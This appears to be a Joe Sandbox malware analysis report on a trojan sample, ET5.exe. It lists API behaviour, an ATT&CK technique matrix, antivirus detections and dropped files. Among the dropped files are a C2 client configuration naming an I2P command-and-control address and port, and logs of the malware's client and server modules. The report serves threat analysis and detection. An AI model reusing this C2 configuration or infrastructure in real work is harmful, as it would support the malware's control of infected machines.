Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe Code function: 11_2_00007FF704896FD5 GetSystemTimeAsFileTime,11_2_00007FF704896FD5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8B91538C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,22_2_00007FF8B91538C3
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: hstmhco83f64lehv4q0wbzqj3o.exe, 0000000B.00000002.2315787188.0000021576038000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8B91709A8 listen,22_2_00007FF8B91709A8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8B915240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8B915240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8B915E549 listen,22_2_00007FF8B915E549
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8B91A3A00 listen,22_2_00007FF8B91A3A00
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8B91901A9 listen,22_2_00007FF8B91901A9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8B9184F8A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8B9184F8A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8BA50CC19 listen,22_2_00007FF8BA50CC19
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8BA50240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8BA50240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8BA51F900 listen,22_2_00007FF8BA51F900
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8BFAB15FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8BFAB15FA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8BFACB820 listen,22_2_00007FF8BFACB820
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8BFB5254A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8BFB5254A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8BFB6E900 listen,22_2_00007FF8BFB6E900
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8BFB8E2B9 listen,22_2_00007FF8BFB8E2B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8BFB81ADA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,22_2_00007FF8BFB81ADA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 22_2_00007FF8BFBA0920 listen,22_2_00007FF8BFBA0920
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | 1 Scripting | 2 Valid Accounts | 1 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 21 Disable or Modify Tools | 1 Network Sniffing | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 3 Native API | 1 DLL Side-Loading | 2 Valid Accounts | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 1 Create Account | 2 Access Token Manipulation | 3 Obfuscated Files or Information | Security Account Manager | 1 System Service Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 3 Service Execution | 2 Valid Accounts | 4 Windows Service | 1 Timestomp | NTDS | 3 File and Directory Discovery | Distributed Component Object Model | Input Capture | 1 Proxy | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | 4 Windows Service | 11 Process Injection | 1 DLL Side-Loading | LSA Secrets | 1 Network Sniffing | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | 1 Services File Permissions Weakness | 1 Services File Permissions Weakness | 1 File Deletion | Cached Domain Credentials | 24 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Masquerading | DCSync | 1 Network Share Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Valid Accounts | Proc Filesystem | 121 Security Software Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 2 Access Token Manipulation | /etc/passwd and /etc/shadow | 21 Virtualization/Sandbox Evasion | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 21 Virtualization/Sandbox Evasion | Network Sniffing | 2 Process Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 11 Process Injection | Input Capture | 1 Application Window Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
| Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Hidden Users | Keylogging | 1 System Owner/User Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking |
| Determine Physical Locations | Virtual Private Server | Compromise Hardware Supply Chain | Unix Shell | Systemd Timers | Systemd Timers | 1 Services File Permissions Weakness | GUI Input Capture | 1 System Network Configuration Discovery | Replication Through Removable Media | Email Collection | Proxy | Exfiltration over USB | Network Denial of Service |
[Behavior graph, image not reproduced. Behavior Graph ID: 1570047, Sample: ET5.exe, Startdate: 06/12/2024, Architecture: WINDOWS, Score: 100]

No Antivirus matches
| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe | 100% | Avira | TR/AVI.Agent.jibab | |
| C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe | 100% | Joe Sandbox ML | | |
| C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll | 0% | ReversingLabs | | |
| C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe | 67% | ReversingLabs | Win64.Trojan.Generic | |
| C:\Windows\Temp\erT926ze | 0% | ReversingLabs | | |
| C:\Windows\Temp\gBXHuZY0 | 0% | ReversingLabs | | |
No Antivirus matches
No Antivirus matches
No contacted domains info
    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1570047
    Start date and time:2024-12-06 14:18:43 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 11m 44s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:28
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:ET5.exe
    Detection:MAL
    Classification:mal100.troj.evad.winEXE@38/76@0/37
    EGA Information:
    • Successful, ratio: 60%
    HCA Information:Failed
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Override analysis time to 240000 for current running targets taking high CPU consumption
    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Execution Graph export aborted for target ET5.exe, PID 7092 because there are no executed function
    • Execution Graph export aborted for target j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, PID 6128 because it is empty
    • Not all processes where analyzed, report is missing behavior information
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size exceeded maximum capacity and may have missing disassembly code.
    • Report size exceeded maximum capacity and may have missing network information.
    • Report size getting too big, too many NtCreateKey calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • VT rate limit hit for: ET5.exe
    Time      Type             Description
    08:19:39  API Interceptor  271x Sleep call for process: ET5.exe modified
    08:19:40  API Interceptor  43x Sleep call for process: powershell.exe modified
    08:20:38  API Interceptor  3143792x Sleep call for process: main.exe modified
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):115712
                  Entropy (8bit):6.193969228624904
                  Encrypted:false
                  Malicious:true
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1305152
                  Entropy (8bit):5.101030479133318
                  Encrypted:false
                  Malicious:false
                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=bddd1a2f)..[I] (sys_init) -> Done(sys_uid=c76a8f08bddd1a2f,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[D] (ini_get_sec) -> Done(name=cnccli)..[D] (ini_get_var) -> Done(sec=cnccli,name=server_host,value=9
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:Generic INItialization configuration [cnccli]
                  Category:dropped
                  Size (bytes):213
                  Entropy (8bit):5.129024990254676
                  Encrypted:false
                  Malicious:false
                  Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=9ad81489..server_port=41674..server_timeo=15000..i2p_try_num=5..i2p_sam3_timeo=15000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):6.236071662185895
                  Encrypted:false
                  Malicious:true
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1021
                  Entropy (8bit):5.4523778210953315
                  Encrypted:false
                  Malicious:false
                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=bddd1a2f)..[I] (sys_init) -> Done(sys_uid=c76a8f08bddd1a2f,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ff8bfb51dbd)..[I] (tcp_connect) -> Done(sock=0x354,host=7
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):92672
                  Entropy (8bit):6.229119632298774
                  Encrypted:false
                  Malicious:true
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):52754369
                  Entropy (8bit):5.192905501908576
                  Encrypted:false
                  Malicious:false
                  Preview:[D] (routine_tx) -> Dispatch an event(size=32,timestamp=1744691639055,code=5449434b(KCIT),sender=2d4556545352562d(-VRSTVE-),receiver=2d2d424353542d2d(--TSCB--))..[D] (routine_tx) -> Dispatch an event(size=32,timestamp=1745642455787,code=5449434b(KCIT),sender=2d4556545352562d(-VRSTVE-),receiver=2d2d424353542d2d(--TSCB--))..[W] (tcp_accept) -> select timedout(sock=0x374)..[D] (routine_tx) -> Dispatch an event(size=32,timestamp=1745642460049,code=5449434b(KCIT),sender=2d4556545352562d(-VRSTVE-),receiver=2d2d424353542d2d(--TSCB--))..[D] (routine_tx) -> Dispatch an event(size=32,timestamp=1745642463049,code=5449434b(KCIT),sender=2d4556545352562d(-VRSTVE-),receiver=2d2d424353542d2d(--TSCB--))..[D] (routine_tx) -> Dispatch an event(size=32,timestamp=1745642464300,code=5449434b(KCIT),sender=2d4556545352562d(-VRSTVE-),receiver=2d2d424353542d2d(--TSCB--))..[D] (routine_tx) -> Dispatch an event(size=32,timestamp=1745642468550,code=5449434b(KCIT),sender=2d4556545352562d(-VRSTVE-),receiver=2d2d4243
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):52754369
                  Entropy (8bit):5.1923591894594745
                  Encrypted:false
                  Malicious:false
                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=bddd1a2f)..[I] (sys_init) -> Done(sys_uid=c76a8f08bddd1a2f,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (server_init) -> CreateThread(routine_gc) done..[I] (server_init) -> CreateThread(routine_accept) done..[I] (server_init)
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):8568
                  Entropy (8bit):4.958673415285098
                  Encrypted:false
                  Malicious:false
                  Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):75977
                  Entropy (8bit):7.8696816318811385
                  Encrypted:false
                  Malicious:false
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.5845968154884025
                  Encrypted:false
                  Malicious:false
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.592586587197845
                  Encrypted:false
                  Malicious:false
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.549605740883306
                  Encrypted:false
                  Malicious:false
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.491093717406676
                  Encrypted:false
                  Malicious:false
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.624675697787775
                  Encrypted:false
                  Malicious:false
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.532526584485549
                  Encrypted:false
                  SSDEEP:12:MZGeE5nI6qMcPgmK8e2gLOchnSqePy+65NPE:VbB4+8e2chzeNohE
                  MD5:6A0E0F5A36D53532780BF05AE75EC8CA
                  SHA1:B781DB722002F1A76A2A5957D55BFA02229C4721
                  SHA-256:C4D9F203C54282D43999C5F047245CED8D60C550012C6227D0C1AD6A385ECB62
                  SHA-512:EB70145C9DEFD19E7507C407617C776369477FCA686CA396A0BD0E005E8052BC53951846AD12F343490134A5C42A516402CE7791E90ED46886313AA7261E4D03
                  Malicious:false
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.587836189726106
                  Encrypted:false
                  SSDEEP:12:5IL2acbOQDeXiU7qtydr12MGrcSHAhjb4V69EGc2LrhAOBr:5ILzQDBf+r8HrBAx4Vyv/5AO9
                  MD5:F467BFD8B8EC048117702F949AEE54CB
                  SHA1:2993376EE3893B87A2F0A8722ADCCFE7CF99C6AD
                  SHA-256:D20E2C900443946290748184DA89C6F05B57CE9FE160F006552116BA6C4BF926
                  SHA-512:22BF29B7DDA016A89895C6C603A2ADCAD9D55FA26C9F367E6FA9491E38253159D50A8FC2E89FDE5AF9BCD5ABC25900BF0F73D89410A7C6CDCC550A9E40AD1CD6
                  Malicious:false
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.5867845737732615
                  Encrypted:false
                  SSDEEP:12:wvFkL4AYX1Nj8wtKTYx/SZ8GjCrUd4KNiFcMBsLtrpRMBrPNh:wdVBjVKOamBgyKNEcMqLfyrh
                  MD5:450A5331471E6F1860DD3D00ADD32D5A
                  SHA1:49AA7CD997413539A0A592FF2FC65A2EC529A5F2
                  SHA-256:812CC4B06C3A314C5F4A8AE92EE0992782639F663EF12BC39F2320F7477C1D74
                  SHA-512:002D494439B1BC988B1C679980D2A5DFB6EF2A1B158CF2536D1F3D19BB3178D6D6452B0BEBE08B4D2E7CCF4CD8069838652B38BEA94FFC5DC73D60A8FD2F7D57
                  Malicious:false
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.542990531846028
